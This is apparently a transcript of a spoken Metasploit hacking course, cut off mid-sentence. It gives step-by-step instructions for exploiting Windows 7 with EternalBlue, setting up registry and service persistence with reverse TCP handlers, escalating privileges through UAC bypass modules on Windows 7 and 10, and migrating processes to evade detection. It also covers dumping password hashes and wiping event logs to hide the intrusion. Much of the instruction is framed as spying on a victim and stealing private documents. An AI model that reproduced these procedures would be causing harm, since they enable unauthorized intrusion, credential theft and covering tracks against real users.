Okay, and just see the server username is what? Anti authority / system is here. Where is the anti authority here? This is the anti authority. Right now I am in this group. Okay, now let me change it to this one, anti authority local services. Okay, let me change to this one. At that time I'm gonna migrate it. Okay, just simple, just type here migrate and see uh, the exe files which are in that group. Okay, what I said, let me migrate to local services. Okay, let me migrate to which one? This one, sv host. And just remember, you just need to select the id here. Okay, what is id here? 1028. Okay, just see pid. Just let me copy it and simple, let me paste the id number there. See, I'm migrating to 992. Okay, failed, access denied. Let me migrate to this one, welcome. Okay, let me migrate to where? Explorer.exe, and here 180.8. Okay, just let me paste it here. Okay, migration completed successfully. And here the thing is, if I type here get uid here, you guys can able to see right now my server username is what? Windows desktop welcome. Okay, this is how the things are working here. Okay, if I type here dir, here you guys can able to see the dll files and exe files, each and everything. Okay, assume that if you want to download something here, simple, you guys can also download this. Okay, there is a wusa.exe is there. Simple, just let me copy it and just type here download. And simple, let me paste the name there. You guys can able to download the stuffs. Okay, just if I open this one, see there is a wusa.exe. This is how you guys can able to download the files. If you want to upload something, simple, just type here upload. Okay, and simple, just paste the location, any file there. Okay, just drag and drop there. Simple, just type enter, it will upload there. Okay, okay, in this class let's learn about persistence. We are setting the persistence in Windows 7. Okay, now how we can able to perform this, and let me tell you what is persistence and why it is important. Okay, well, let me explain you here. See, let me tell you, first of all, this one, we exploited this system by using what? The vulnerability. Okay, the eternal blue vulnerability. We doesn't send it any kind of payload here. The victim doesn't execute anything. Okay, simple, what we did, we just attacked the system through vulnerability. Okay, because in this system the vulnerability is there, so that's why we can able to attack that one by using this exploit. But assume that what will happen if this guy, the employee or this user, patched this vulnerability. Okay, at that time we lose our victim. Okay, this is the thing. Basically, let me explain you in the easy way what is persistence here. See, after some days, okay, I just hacked this system. This is my target system. I just hacked this system. Okay, and I just downloaded some personal data and I am spying on him. Okay, through which after exploiting the system through vulnerability. Okay, which is eternal blue vulnerability or any other vulnerability. Okay, I just exploited this system and I'm hacking. I just hacked it and I'm performing the spying there. I'm sorry guys. Okay, I just downloaded the private documents, each and everything. But after some time, what happened means the user know that my system is vulnerable. Okay, my system is vulnerable. At that time, what he do? Simple, he will update his system or he will patch that vulnerability. Okay, he will update or he will patch that vulnerability. Okay, after patching it, what will happen means we can't able to communicate with our system, with our target system, because the vulnerability has been patched. Okay, this thing has been patched here. After patching this vulnerability, we can't able to connect with it. So at that time, in the red teaming, in penetration testing, mostly in red teaming, what we do means we perform the persistence here. After assume that this guy successfully patched the vulnerability, still I can able to communicate with this my target IP, my target system through this persistence. Okay, this is the thing. And the second thing is, in hacking field about persistence is a nothing but, see, I just hacked this guy system, okay. This let me this one, okay. I just hacked this system, okay. After hacking the system, I can able to communicate with him, okay. Now assume that this guy has been restarted his computer, okay. Restarted his computer. At that time, what will happen? I can able to lose the connection, okay. Yes, let me show you practically. See, right now I just hacked this system, okay, this one using the vulnerability, okay. Now let me restart it. What will happen? Let me show you. Let's go back here. See, right now I can able to interact with my target system. See, here is a Meterpreter session is there. Now let me show you what will happen. It will take some time. For just type here help. See what it's showing? Meterpreter session has been closed because it's restarted, okay. So that's why I can't able to communicate with him. To communicate with him again, I need to send the payload, or again I need to exploit. I just told you what will happen is, if my target patched that vulnerability, then everything will be lost, okay. At that time you need to set up the persistence, okay. How to set up? Now simple thing is, just go back in the Metasploit only. Just go back and search for, just type here search persistence, okay. Now here you guys can able to see the exploits for this one, okay. Now the basic exploit is, you can also use this one. This is for Linux, okay. Let me tell you, this OS X, okay, it's for Mac. You just need to only select the Windows, because your target is Windows here, okay. Windows, there is a Windows, okay. This one is excellent. Windows persistence registry, startup payload installer. See, majority of people use this one, okay. They just target the payload on Windows persistent registry startup, okay. They will inject the payload on in the registry, okay. Yes, whenever our target restart our system, then what will happen means, we can able to just let me use this one, okay. It's for the same, okay. After it's for the vulnerability base as well, it's for the restart base as well, okay. Assume that if the vulnerability patched here as well, I can able to communicate with my target, because I am using the persistence here, okay. Now let me show you in the practically, okay. Just type here use, what is the number here, 16, right? Just type here 16. The thing is, sorry, I just forget it. First of all, you need to hack your system, okay. The session has been closed here, so let me hack it, okay, again. Okay, search. The hell, man, what happened here? Okay, now it's working. Eternal blue. Now there is, which one I use? Yeah, I use this one, okay. Use 0. Again I am saying, after attacking the system, okay, after hacking the system, you just need to perform this step, okay. Yes, use 0, and what I just set up each and everything here. I just need to set up my target IP only, okay. Just let me exploit it. Now the attack has been started. Now it will take some time. So I successfully hacked my system, my target system. Simple, you just need to type here background or BG, okay. Now see, it has been background. Now you guys can able to use another module, okay, to see that sessions, okay. Basically the sessions has been background. To see the sessions, simple, just type here sessions, okay. You guys can able to interact with this one, okay, after doing the process. See, remember the session ID is very important here, okay. Yes, now if I want to interact with this session, then what I need to do, just simple, just type here session Okay, just type here 6, the id, sorry, sessions 6. Now I can able to interact with this session. Okay, let me do it background again, or you guys can also type bg. Okay, now let me use this module. Okay, this persistence module. See, first again I am saying, first you need to hack the system, then you need to follow the persistence step here. Okay, see, again I am saying, see, I just attacked this system and hacked this stuffs. Okay, see, I got the connection here. Then what I did, I just background the session, then I am using the another this one, the module. Okay, now let me search for persistence. Okay, tense. Okay, now which one I need to use? Let me use this one. Just type here use 16. Okay, all right, now just type here show options. It's a very basic one. Okay, you guys can also add the name here. Okay, see, the file for the payload to be used on the target host. Okay, you guys can also name it. Just type the set exe underscore name and set up the name, but it's use a random names here. Okay, there is a path is there, path to write the payload. Basically by default this will write on temp folder. Okay, registry name, this is not for this one. Okay, for beginners you no need to worry about this all stuffs. There is a startup user is there. Okay, just see, there is a delay is there. Okay, delay in seconds. After 10 seconds the connection will communicate with you, your target will communicate with you. Okay, now here there is a what payload options. Okay, here there is a what lhost is there and lport is there. Here what you need to set up, the thing you just need to set up is session. Okay, I just told you, you just need to remember the session number there. Okay, session id, simple. From here also I can able to see the sessions. Okay, you no need to worry. Simple, if I type here sessions, okay, here I can able to see the id is 6 here. Now simple, just set the session here. Okay, just type here set session, let me paste it and set the id here. Okay, the id is what, 6. The id has been successfully set up. Now see, basically in the let's go back here. It's using which payload port? It's using the 4444. Okay, see which one, this payload, this thing is using, the payload is using 4444. Okay, our system is using 4444 payload, sorry, the port. Here you just need to change it. Okay, just change this one, because this one and the precisions one can't use the same port. Okay, because every port is single. Okay, it's not like duplicate or something like that. You just need to assume that you just given the previous port is 4444. For this you need to change the port. Okay, just type here set l port, let me change it to 5555. Okay, now simple, exploit it. See, failed to make entry in registry for persistence. Okay, why? Note current using the startup user, this may not log in often, maybe a script. Okay, the simple thing is, let me use a different one. Search persistence here, type here back, and let me search for persistence again. Let me use another excellent one. Let me use this one, use 18. Registry persistence is there, right? Use what, 18. Okay, just type here show options. Here what you need to set, the same thing. Just type here set session. What session is it? The session number is 6, right? And here there is a sleep time. Sorry guys, see, here there is a yes, just select that one. And here the thing is lhost is my Kali Linux IP, and I just need to change the what, l port. Set l port 5555. Let me exploit it. Ensure run key, exploited about it due to failure unknown, not ensure run key. Okay, Just this will happen, okay? Type here sessions again. Okay, the session doesn't it's not created any kind of session here. So let me do it again. Just type here back, search persistence. I just use this one, right? Let me use this one, persistence service, use 17. Just type here show options. Now the same thing you just need to add here, session. Just type here set session to what, 6, and let me set the L port to 5555, and also let me check the IP of my Kali machine, 183. Right, just simple exploit it. Okay, now it's successfully executed. Okay, now see, let me type here bg for background. Just type the session. See, I got right now I got two sessions, one is 6 and one is 7. Okay, now let me tell you, 7 is a persistence one, okay, and 6 is not persistence. Okay, yes, this is a previous one, we all know that. Okay, now just type here sessions 7. Okay, I can able to execute this one, I can able to interact with it. Now assume that this guy patched this vulnerability, eternal blue vulnerability, okay, and still I can able to access the system because I did the precisions here. Okay, I just injected my payload where, here you guys can able to see where interpreter service exe return to where c windows temp crhpf.exe. Okay, and the cleanup interpreter rc file is here, and there is a sending stage to where my stage to where our target system. Basically what he did, he generated the payload, he added the payload here. Okay, where library sorry guys, computer, there is a user, sorry, yeah, I just told you these things are in hidden. So at that time what you need to do means sorry guys, simple, let me type here show hidden folders is here, hidden files or folders. Here you just need to select the show hidden files folders and drive, select it, apply. Here you guys can able to see just type c and there is a where it's users, user, there is a default, in default there is a app data where it's saved. Let me see where it is, man, app data, sorry, see windows temp. Okay, sorry for that. See where is the windows, there is a temp is here, here is a temp. See, I can you current you don't have currently have the you don't currently have permissions to access this for simple continue. Here it's generated one payload where it is with the which name. Okay, it's generated the payload with crhpf. This is a nothing but this is our payload. Okay, whenever this guy passed this vulnerability or he just restarted, automatically the payload will be executed and we will get the connection here. Okay, let me show you. See, right now I can able to interact with him. Okay, now let me restart this. Sorry, I did shut down there. Let me start it again. Let me type here help. I can able to see this, but I can't able to communicate with him. Okay, if I type here dir, see, I can't able to communicate. See, interpreter session closed. 6 has been closed. See, 6 is not persistence. Okay, we just exploited this using what? Using vulnerability. Okay, just let me type here where it is. It's restarted. Just type here. There is a no active sessions out there. Okay, now what you need to do, the simple thing is you just need to go back, or let me type here back here. Okay, now just listen for the connection. Which payload is, just let me go back here. Just let's go up. Let me see which payload it's used for this. It's used the Windows interpreter, what? Reverse TCP. And which port? Port is, I just changed the port to 5555. Okay, now what you need to do, now simple, you need to listen for the connection. How? The simple thing is just open, just let me clear this one. Okay, now just type here use exploit / multi / handler. Okay, now just type here set payload and paste that payload here. Okay, and set lhost. And what is my Linux? This one IP, sorry, if config, and this is my IP. And just type here set L port. What is that L port? 5555. Now just tell me, I didn't send it any kind. Right now I am not sending any kind of payload. Basically in the last scenarios, what I did, I just performed the precisions thing there, and it's automatically generated the payload in the Windows system, and it's saved in where temp folder. Okay, simple. Let me exploit it. See, I'm getting the connection here. This is the thing. Assume that if the until this guy doesn't know the things, okay, majority of people what they do means this temp folder is in a hidden mode. Okay, a lot of people won't care about this all stuffs. Okay, yes, this is the thing. There is a different advanced techniques are there to do this all stuffs, but for beginners this is a good stuffs. Okay, to understand the things and each and everything. Now this is a thing basically. Okay, assumed again I am saying, if the vulnerability patch or this guy restarted the system or anything happened after month or week or year, until he just didn't deleted the payload, okay, you guys can able to communicate with this guy. Okay, this system, because right now this guy is a, we just perform the precision stuffs there, right? Okay, now let's learn about privilege escalation as well. Okay, now to we all know that this is a basic thing. If you type here get system, then right now I am a administrator, I know this all stuffs. Okay, I am an administrator. Now I need to just assume that I am a normal user at that time. How I can able to perform the privilege escalation, I'm gonna cover that one too. Okay, the last classes we learn about persistence. Okay, now here let me do one thing. Let me perform the privilege escalation in where in Windows 7. Okay, let me show you. In the last classes, in the first, okay, in the starting I just generated two payloads, right? One is Shika and one is normal payload. What I did means I just let me download this Shika. Okay, it's successfully downloaded. Now let me set for listener. Okay, now use simple, just type here use exploit multi-handler and simple set payload, which we did in the last classes. See, again I am saying I am not exploiting the vulnerability here. Simple. I am just generating the normal payload and I just send it to my target system. From here I am performing the privilege escalation, okay? Because whenever I just perform the eternal blue I just exploited to eternal blue vulnerability, there it's executed as an administrator, okay? So whenever the payload executed as an administrator, then we no need to perform the privilege escalation, as I told you in the last classes as well. But see, you just binded your payload with any other file, okay, and you just send it to your victim, then he just double click it, okay? We got majority of cases we can able to hack the system, but the connection the payload is executed as a normal user, so we can't able to perform the huge processes there, okay? So that's why I just told you about the privilege escalation, right? Why the privilege escalation is important, okay? So this is the thing, right? So that's why what I did, basically I just I'm using this payloads, okay, because this execute as a normal users, so it is easy for me to explain you this all stuffs, okay? Now just type here set lport, sorry, lhost to my Kali Linux IP, and let me use lport to what, 4444, okay? Just type here exploit, don't be confused here, okay? Just type exploit here. Let's go back. Here is a Shika. Let me run it as a normal user. Now I got the connection. If I type here get UID, see here I am a normal user. If I type here shell, here you guys can able to see right now I am a normal user. I just type here exit and just type here BG for background, okay? Now simple, we will use one more. See, let me show you sessions one. Just see, if I type here help, there is a one command is there. By using this we can able to perform the privilege escalation, okay? But majority of cases it doesn't work. Let me show you. See, I just what I did, I just executed this payload as a normal user, right? So just see, it doesn't work right now. See, get system, it doesn't work, okay? So at that time we use a different modules, okay? Now let me show you how we can able to perform that. Simple. First of all, remember one thing, just type BG here, background, okay? Then just go back, clear, to clear this all stuffs, and simple search for suggester. See, suggester is a module which will help you to which will help for scanning purpose, okay? It will scan the system, our target system, and it will tell it will show some exploits to perform the privilege escalation, okay? Yes, to use this, simple, just type here use the ID, hash ID is what, 0 here, or you guys can also copy the name and paste it here, right? Just type enter. Now simple, just type here show options, okay? Here you guys can able to see session. You just need to set the session only, okay? First of all, let me see the sessions session ID here. Here the session ID is 1, okay? Now let me set the session here. Just type here set session, and what is the ID? ID is what, 1. Just type enter and exploit it. Now it will scan, okay? Collecting local exploit for x86 Windows. It will take some time, okay? So you need to wait. It's collecting exploits. It's around 2264 is there. See here, this is the thing we want, okay? See here what it's showing. The target is not exploitable, and you just need to focus here, okay? The target appears to be vulnerable. The targets appears to be vulnerable. You just need to target this one. See, basically we need to perform the privilege escalation, right? There are token magic is there, okay? We no need this all stuffs, okay? Simple. we need to bypass what? See, there is a one exploit is there which is very famous to perform the privilege escalation, which is this one. Okay, just let me copy this one. The name of that exploit forward slash what? Windows local bypass UAC event viewer. Simple. Just type here back. I just scan that one. Just type here back and just type here use. Paste the exploit name now, right now. Okay. And now just type here show options. Here you just need to add what? Just see. 4444 is here. Here we need to add the session. Set session. What is the session? Session is one there, right? Okay. Now here our L host. I just told you. You just need to change the port because the listening port is same. Okay. The 4444. Let me change this port. Okay. Because the previous listening port is also 4444. Okay. Remember one thing. If you are using the same port for 2 times, okay, like the see, I just generated this payload using the 4444, right? So you won't get the connection if you are using the same port for 2 times. Okay, this is the thing. Just type here lhost, sorry, lport. Just type here 5555 or any port. Okay, just type enter and exploit. Hope it will work. Okay, see, bypass UAC can be bypass the settings. Right, excellent man. So if you type here get UID, here you guys can able to see win welcome is sorry. Just type here back, exit, and just type here sessions. Here I got 2 sessions. Okay, one is what? A normal one. See, Windows welcome at the rate win9f something. Now here there is another one, NT authority / system underscore. I just told you NT authority is nothing but it's a what? It's administrator. Okay. Now just type here sessions 2. Okay. Right now I am interacting with the session 2. Okay. Now just type here sys info. Okay. Here there is a logged on user architecture is here. Okay. And just type here get UID. See, right now what I am administrator. Now simple, let me type here shell. See, system 32-bit. This is the thing. Okay, see, you will learn in red teaming training why this privilege escalation is important. Okay, you will be shocked by using if we get the privilege escalation of our target system. Sorry, after performing the privilege escalation in our target system, okay, we can able to perform each and everything. Okay, we can dump anything, we can change the username and the password of our target, we can do a lot of stuffs. Okay, this is the thing, right? So this is how you guys can able to perform the privilege escalation in Windows 7. Now in this class I'm going to teach you how you guys can able to perform the privilege escalation in Windows 10. First of all, you just need to hack your target system. See, I just set up the previous stuffs only, like set payload meterpreter, reverse TCP, lport 4444, lhost IP, and I just click on exploit. Okay, now let me execute this one as a normal user. Okay, just double click it, just click on run. See, I got the connection. Now simple, just type here sys info. Here you guys can able to see it's a Windows 10, and let me type here get UID. Okay, it's a desktop IoT. Okay, and just simple, just type here, let me see shell. Here you guys can able to see it's a normal guy. Okay, now let me click on exit and me clear this. Sorry, I can't able to clear this. First of all, I need to perform the privilege escalation here. At that time, what I need to do? Simple. First of all, I just need to do the background. Okay, just background this session. Just type bg and enter. Okay, now let me clear this. Right, then just simple, just type back here. Now search for suggester. The same steps you just need to follow for persistence as well. Okay, just use a different modules here. Okay, search suggester. Like here is it, here it is, sorry, just type here use 0, and first of all let me see the session ID here. The hell man, what happened? The session is closed. Just let me type sessions here. The hell man, what happened? Step back. Let me set up again. I don't know what happened. Set lhost. Set port. Exploit. Let me. Okay, it's due to Windows Defender, I think. Okay, yes, it's due to Windows Defender. Okay, let me use Shika instead of normal one. Okay, so here it is, double click it, run. Let's go back here. Okay, I got the connection. Right, now simple, just let me type here get UID. Okay, it's a normal user shell. Okay, just type here back, sorry, exit. Just type here bg for background. Just type here back, search for suggester. Okay, use 0, the same thing. Okay, now simple, just see the bg, the id is 4. Okay, now just type here show options. Okay, now set session to what? The id is 4. Just type 4 and exploit. Now it will show the vulnerabilities which are in Windows system. So here is the things. Okay, see, I got this one, exploit Windows local bypass, the same thing which I got in the last class only, last class. Okay, like a bypass UAC event viewer, and there is another exploit I got, bypass UAC FOD helper is there. Okay, where it is, FOD helper is there, bypass SULI SLUI hijack is there. Okay, it's it has been vulnerable. Okay, and there is a CV, just ignore this, let's focus on this one. Okay, bypass UAC Ford helper is there. Okay, now simple, just copy this one. Let me use a different module now. Okay, just type here back, the hell, just type here use, paste it, enter. Just type here show options. What is this? You just need to add the session, and you just need to change the L port there. Okay, now just type here set sessions, session ID is 4. Sorry guys, set L port, let me change the L port to 6666. Just let me exploit it. The hell man, what happened? Exploit, let me see. UAC bypass, UAC can bypass these settings. Okay, now just type here, sorry, exit. Just type here sessions to see the session. Just see, I got I didn't got any kind of new session here. See, meter session 5 opened. It's saying that but I can't able to see the sessions here. Just type here back. Okay, and let me type here session. Why I can't able to see that? See, it's saying that meter session 5 opened, but whenever when I just type the sessions here, I can't able to see that. See, so no problem, it happens. Okay, so let me use it again. 0. Search. Okay, I think. Okay. Simple. You just need to type exploit here. You no need to set up the L port. I thought that just using for bypass UAC. Okay, so that's why it's given the L port. The simple thing is I am doing the same process again. I can also see that, but still I am doing that. Okay, it's successfully exploited, but still the thing is I can't able to get the session. Okay, the session is also open, but I can't able to see that whenever. So let me use another one. See, we all know that by using this we can able to perform the privilege escalation, but let me use this one as well. Okay, bypass UAC LUI hijack. Let me use that. Okay, now just type here back use, simple, paste it here. Okay, now here it is. It's excellent. Windows UAC protection bypass. Okay, now just type here use 0. All right, just type here show options. Here the same thing you just need to set up. First of all, let me check for the session ID. The session ID is 4, and here is a set session to 4, and you just need to change what? L port. Okay, set L port, let me set to 7788, and let me also set the target. Okay, set target 0. Okay, now let me exploit it. Okay, now let me type here get UID shell. Okay, I got the right now I got the what? I can able to perform the privilege escalation here. See, I got the system 32-bit. I think it just continued the shell. Okay, it doesn't created any new session there. See, it's saying that meter session 6 opened, but it's continuing the same session. Okay, like the last same session. So this is the thing. Okay, let me type here exit. Okay, just type here again exit. Let me type here bg, just type session. See, it's created new session, but I don't know why, but for last it doesn't create it. Okay, now there is a 4 and the new one is 6. Okay, but see, let me go back here. Here just see it's created the session 5 open, but still I can't able to access that. Whenever I just type the sessions here, I can't able to see that. Maybe I just forget it to do the background, I think. Okay, no problem. See, this is how you guys can able to perform the privilege escalation in Windows 10. Okay, the simple thing, guys, the simple thing is you just need to use the suggester for that. Okay, sometimes suggested won't help you. Okay, At that time you just need to learn more, okay, which we covered in red teaming training. This all stuffs, okay, each and everything, like AD penetration testing, internal and external pen testing, each and everything, okay. Now this is a thing. Now let's do one thing. Let's perform the precisions as well, okay. Just type here back clear, then just search here. First of all, let me see the sessions, it's closed or not. Okay, I have the sessions here. Now just type here search persistence, okay. Here I got the persistence modules. Simple. The thing is, it's for Linux, is there Unix. The thing is, for we need for Windows, right? So let me target for Windows. Let me target the excellent one. This is excellent one. Let me use it's a 2012 auto start is there. I think in the last classes we used this one. Local VSS persistence is there. Let me use this one. Use 7. Show options. Here it is. You don't need to change this all stuffs. There is a R path. R path is there. If you want to change it. Okay. Run key session is there. Let me add the session here. Timeout in 60 seconds. Okay, let me try it. Okay. First of all, let me set session. Let me set session to 6. Okay, the administrator one. Then let me change the L port. I just told you. Set. Okay, let me type it. Okay, set L port to 8888. Just type enter, exploit. Now let me see it will work or not. Creating shadow volume copy. Exploit failure. Okay, no problem. It's not working. Let me use another one. Installer. SCXI local VSS server. Okay. SSH key precision is there. Exploit. This is the only one which is working great. Okay. And this one, registry persistence, is working great, and exploit Windows local precision service is working great. Okay, let me use the same thing. I think let me use registry persistence. Just type here use 18. Show options. See why I am doing this all stuff. So I can also select the working one as well. But see, sometimes in your case the things won't work. Okay, so that's why I am using the different exploits. So by watching this, you won't get that much tension about this all stuffs. Okay, because you just need to only add the session ID there. Okay, you will get a complete idea. First you need to target your system. After targeting the system, you just need to perform the precision, you just need to perform the privilege escalation, then just perform the persistence. Okay, now either you guys can also, after exploiting the system, you guys can also perform the persistence there. Okay, Yes, this is the thing. It's totally depend upon you. But some exploits, okay, some exploits won't work like that. Okay, they need they need privilege escalation for that. To make the payload persistence in the Windows system, they need the privilege escalation. But let me tell you, this module won't need the privilege escalations. Okay, yes, this is a thing, right? Okay, just type here set session. Let me use a non-privilege escalation session, which is 4. Okay, now let me set L port to 8888. Sorry, 388, no problem. Just type here exploit. See, it will work. Simple. What you need to do, just type here exit. You no need to do BG or something like that, because you got the persistence here. Okay, in this class you will learn how you guys can able to clear the locks on your victim system. Basically, whenever we just inject anything, or whenever we just perform privilege escalation persistence, here the thing is you just need to everything what we are doing will store in our target system. Okay, on our just let me show you practically. So this is a event viewer. If you click on the Windows logs, there is a application is there. Okay, here whenever you perform anything, okay, will store in here. Okay, there is a information is there is a path. So the simple thing is, see, you no need to worry here. The simple thing is, after performing the whole attack, you need to clear this locks. Okay, how you guys can able to clear the locks? Okay, simple. See, right now here you guys can able to see the locks, right? Now let me clear this all stuffs. Simple, just type here help. Here there is a clear EV. Simple, just paste it here. See, it's wiped the 38392 records, 3119 records from system, 23295 records from security. If I go back here, just click on the security, there is a nothing. If you click on the application, see, in the last time there is a huge, right? Whenever we see in the previous, we just see this stuff, so it's a huge. Right now it's clear. By using this stuff, this command, we clear this logs. Okay, so this is a thing basically. Okay, see, by using this, user can able to identify that somebody has been hacked his system. Okay, this is the thing. So that's why we are clearing this all logs. Okay, now the main important thing is, in the last classes we just performed the precisions in Windows 10. Okay, the same thing. Okay, it's nothing. The important thing is, I want to say, in this classes we are doing each and everything by using this Metasploit. Okay, you didn't use any script, you didn't modify anything. Okay, it's complete automation stuffs. Okay, so you no need to worry. The same thing which you apply for Windows 10, Windows 7, you applied on Windows 10 as well. Okay, I use a suggester for Windows 7, I use a suggester for Windows 10. Nothing has been changed. Okay, I use the different modules to teach you how you guys can able to set up the options here or something like that. But the thing is, I use the same stuffs. Okay, so in the Windows 7, after doing the persistence, I just exit and I listen for the new connection. At that time, I just change the port. Okay, because whenever in the persistence, I just use the 888, right? After doing the persistence, after doing the successful output, after seeing the successful output, you just need to listen for the connection on that port. Okay, the 888 port. Simple, you guys can able to get the connection. Okay, this is the thing. Again, I am saying, you no need to worry. The things are same for Windows 10 and Windows 7. Okay, you just need to use the suggester. in Suggestor you guys can able to see the exploits, okay, which are vulnerable, sorry, your system is vulnerable with, okay. So you can use it and exploit it, very easy stuffs, okay. But see, let me tell you, in red teaming the things are completely different, okay. It's a very, it's kind of advanced stuffs, okay. We use the different scripts, each and everything. But this is how you guys, again I am saying, this is how you guys can able to clear the locks. Hello guys, hope you are fine. In this class I'm gonna explain you about what is this migration, okay. First of all, let me interact with my session, okay. If I type here ps, here you guys can able to see the process, okay. Now let me just type here get uid. See, right now I am a normal user, okay. And also let me type sysinfo. See, here the thing is, see why we perform the migration here, to change the architecture, okay. Assume that our target system is 64-bit, okay. Our payload has been our payload is a 32-bit. See, 86, 30, 32, it's same, okay. If whenever I say 32-bit, then you just need to remember 86-bit, okay. It's a 86-bit. Now just see, assume that I just sended the 32-bit payload to my target system, okay. He just executed it, okay. Even here our target system is 64-bit, okay. Then also see, then also the 64-bit guys can able to execute the 32-bit payloads, okay, the 32-bit applications as well. But 64-bit pay just let me explain you here. There is a 64-bit, 32-bit, okay. Now this is a nothing but this is a architecture, you no need to worry about this all stuffs, okay. Now let me explain you. See, my target system is 64-bit, okay. What I did, I just generated the payload sorry guys, payload of 32-bit and send it to my target system. He just executed it and I got the connection here, okay. I got the connection, got connection. Now sometimes what will happen means some process won't work, okay. Assume that you need to execute some commands here, it won't work, okay. You need to execute some scripts there, okay. It won't work at that time. At that time what we need we do means, see, again I am saying, I just send it the 32-bit to my 64-bit target machine. He can able to execute my 32-bit, okay. This is the thing. Now after executing that, I got the connection, okay. Now sometimes I just told you, sometimes some commands won't work, we need to execute some scripts in real world PT. The thing is nothing but it doesn't work sometimes, okay. Majority of cases it doesn't work. That's the thing, okay. At that time what I need to do means, I need to change this 32-bit to 64-bit, okay. 64-bit. Because why? Because my target system is using the 64-bit, so I need to change the 32-bit payload to 64-bit, okay. This is the thing, okay. If my target is having the architecture, my target is using 32-bit architecture, then I no need to change this all stuffs, okay. But sometimes in majority of cases, majority of people or companies or systems are using the 64-bit only, okay. So that's why I need to migrate to 32-bit, okay. The simple thing is what I am doing here is I just changing to 32-bit payload to 64-bit, okay. This is the thing. Let me tell you one notice here. See, assume that your target is 32-bit, okay. Then you no need to do this whole process, okay. This is the thing. And let me tell you, migration, sorry, this migrating, like see, whenever we perform this migration, what will happen means we can able to avoid the detection, Okay, basically hiding the process. Okay, we are hiding the process to gain. Yes, by using the migration you guys can also perform the persistence as well. Okay, and you guys can avoid the detection. Now let me show you that one. See right now what is my this one 86 bit, right? Like 32 bit. So 86, again I am saying 86 is nothing but 32 bit only. Okay, now let me migrate. Just type here migrate. Now here you guys can able to see some x64 bit architectures are there. Okay, now let me migrate to this one, explorer.exe. See, again I am saying it will help you to avoid the detection. Okay, this is a thing. Just let me paste it here. Now just type here get UID. Sorry, see here, sorry man, sysinfo. See right now our payload architecture is what, x80 64 bit. Okay, and our target sorry guys, our target architecture is also 64 bit and our payload is 64 bit. In this case we can able to execute the scripts and we can able to avoid the detections, persistence, each and everything. Okay, so this is the thing. See, again I am saying majority of target attackers, what they do means they migrate to SVC host. Okay, but the here in the process architecture I can't able to see that things. Okay, and also the thing is, okay, it's nothing. You can also migrate to another group as well. Okay, I just in the last classes I just showed the covered that thing. Okay, so this is the thing. Let's dump the hashes. Okay, from our target system. See, in this classes you will see a huge errors. Okay, but I will try to fix it. Okay, you will learn a lot of stuffs here. Basically we are doing here, we are using the features of migrate. Okay, I just told you in the last classes migrate can do a lot of stuffs. Okay, where you guys can able to change the bit architecture. Okay, and you guys can able to change the groups as well. Okay, and you guys can able to perform the precisions here, and by using the migrate you guys can able to avoid the detections. Okay, this is a thing here. Now the simple thing is, first of all I need to hack the system. The simple let's go from basic stuffs. Okay, like in the last classes in the beginning what we did, we just msf console q. So here it is, just type here use exploit / multi handler set payload windows / meter filter words underscore. See, I'm not passing any kind of stuffs here. Simple, I want to show each and every error and I'm gonna fix it. Okay, now just type here set lhost 192.168.133. Yes, 183. This is my Kali Linux IP. Set L port to 4444. Okay, and simple exploit. Victim executed the payload here. Okay, I am just executing this as a normal user. If you just see here get UID, right now I'm a normal user. If I type here shell, maybe you guys can able to see. Okay, right now here you guys can able to see it's executed as a normal user. Just type here exit. Sorry, why exit is not working. Okay, right now simple, just type here again help. In this classes it's about the hash dump, right? Let me type here, let me copy this hash dump and let me paste it here. See, I can't able to dump the hashes. So we need to perform the privilege escalation. Okay, just type here bg for background. Let's perform the privilege escalation here. Remember, you need to first of all, whenever you exit from this interpreter, or if you are performing the privilege escalation, remember you just need to background the session. Okay, yes, or else you can't able to perform the privilege escalation, because first whenever you perform the privilege escalation, the module interact with this session. Okay, uh, then only it will show the output. So this is the thing, don't type the exit or something like that. Okay, now just type here, we all know that we use the suggester. Okay, search suggester. Okay, yes, suggester. Let's see, yes, suggester is there. Just type here use 0 and set, we all know that, set session. What is the session there? First of all, let me check the session ID. The session is 1, ID is 1. Okay, now just type here set session. Sorry, let me type here show options, because you guys can will get some kind of confusion here. And here is a let me set this session. Okay, set session. What is the session number? 1. Just type here exploit. We did this whole process in the last classes. Okay, again I am doing. It will take some time. All right, here is a bypass this one. Just copy it, just go back here, just type here use, let me use this one, and just type here show options, set session to what, I think 1, right? Yes, and you just need to change the L port here, L port to, let me change it to 6666, and then exploit it. Right, now I can able to perform the privilege escalation here. Right, the interpreter session to open. If I type here bg, okay, and just type here sessions, here you guys can able to see that 2 sessions are there. I just need to check which one is a, this is a new session, right? The previous one is id 1. Let me see this one. Okay, session, let me interact with the id 2 and just type here shell. Right now it's a administrator. Okay, exit. Right, and just type here help. Now see what will happen. Here I can able to see the hash dump. Let me dump the hashes here. I can't able, still I can't able to dump. Now the thing is, just see, if I type here sysinfo, you guys can able to see our window interpreter architecture is the payload is what, 86-bit, and our this guy, our target architecture is 64-bit. Maybe this kind of error, right? Because my payload is 86-bit, so that's why it can't able to dump the passwords there. At that time, I'm gonna perform the migration here. Simple, you know, right? Just type here ps and perform the migration here. Okay, let me change to svc host. Okay, see, let me tell you one thing, guys. These are the different groups. Okay, local services is there, network system services is there. Okay, basically these are the different groups. Right, now let me do one thing. Let me migrate to NT authority system. Okay, the svc host. Now let me jump to this one, 2556. Right, now simple, just type here migrate and just paste it here. Now just type sysinfo. See, maybe the architecture has been changed. Yes, it's changed. It says 64-bit right now. Now just type here help again. Let me type here hash dump. See, right now I can able to dump the passwords there. Okay, this is a thing. Whenever you see this kind of error, just play with it. Okay, don't be panic there. If you are not getting also, just try to do this stuffs. Okay, see, every group is a different stuffs here. Okay, in the PS, whenever you just a PS, everything is different there. See, it will take a huge time to explain this all stuffs. Okay, but the simple things, again I am saying, it's a very simple thing. Okay, if you want to migrate something, just first of all, just try to target the system. Okay, because whenever I just target the network services, then the things will completely change there. Okay, yes, just do it. Okay, just let me show you that one also. Right now I just dump the hashes. Let me copy this hashes and let me save this, because to crack this stuffs. Okay, right, document hash create, just type, just paste it here and save. Let's go back here, sorry, here. All right, now just see, if I type ps, the things are completely changed. Okay, see, I can, the previous stuffs I can't able to see. See, in the previous, when I just type ps, see the results there. Okay, first there is a smss is there, maybe PowerShell is there. Okay, in the last there is a PowerShell. Maybe let me check the PowerShell is there or not here. Okay, you can also type the pgrip there. See, the things are completely changed because you just navigate to another stuffs there. Okay, another user as a anti-authority system. Okay, now what if I migrate to anti-authority network services? Okay, this one, let me target this svc host here. This is also administrator. Just see, it's a system 32-bit. Okay, see here, if you want to migrate to this folder, just say temp, then you just need to choose this one. If you want to migrate to explorer.exe, just choose 